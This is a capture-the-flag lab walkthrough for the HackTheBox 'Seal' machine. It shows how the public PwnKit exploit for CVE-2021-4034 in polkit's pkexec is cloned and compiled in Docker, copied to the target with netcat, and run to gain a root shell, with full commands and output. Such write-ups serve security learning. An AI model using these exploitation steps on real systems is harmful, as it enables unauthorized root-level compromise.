InfoSec LAB

Seal_Privilege_Escalation_2

Created: 3 min read

CVE-2021-4034

peas discovered that the target system is vulnerable to cve-2021-4034 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034 The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

exploit (pwnkit)

I found an exploit online

tomcat@seal:~$ make
 
Command 'make' not found, but can be installed with:
 
apt install make        # version 4.2.1-1.2, or
apt install make-guile  # version 4.2.1-1.2
 
Ask your administrator to install one of them.
 
tomcat@seal:~$ cc
 
Command 'cc' not found, but can be installed with:
 
apt install gcc              # version 4:9.3.0-1ubuntu2, or
apt install clang            # version 1:10.0-50~exp1
apt install pentium-builder  # version 0.21ubuntu1
apt install tcc              # version 0.9.27-8
 
Ask your administrator to install one of them.

The target system doesn’t have compilers installed. Opting out to remote compilation

Docker Exploit Development

┌──(kali㉿kali)-[~/archive/htb/labs/seal]
└─$ docker run -it --entrypoint "/bin/bash" --name seal ubuntu:20.04  
root@b7ad5c17638b:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git

Setting up the environment

root@b7ad5c17638b:~# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034 ; make ; cd .. ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
unpacking objects: 100% (92/92), 22.69 KiB | 1.03 MiB/s, done.
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true gconv_path=./pwnkit.so:.

One liner to download & compile & package the exploit Ready for transfer

Exploitation

root@b7ad5c17638b:~# nc 10.10.10.250 2222 < CVE-2021-4034.tar.gz
tomcat@seal:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on 0.0.0.0 2222
Connection received on 10.10.14.7 51668
tomcat@seal:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete

tomcat@seal:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# hostname
seal
# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.250  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:d927  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:d927  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:d9:27  txqueuelen 1000  (Ethernet)
        RX packets 113088  bytes 11818508 (11.8 MB)
        RX errors 0  dropped 86  overruns 0  frame 0
        TX packets 94340  bytes 360222718 (360.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1280  bytes 3935419 (3.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1280  bytes 3935419 (3.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks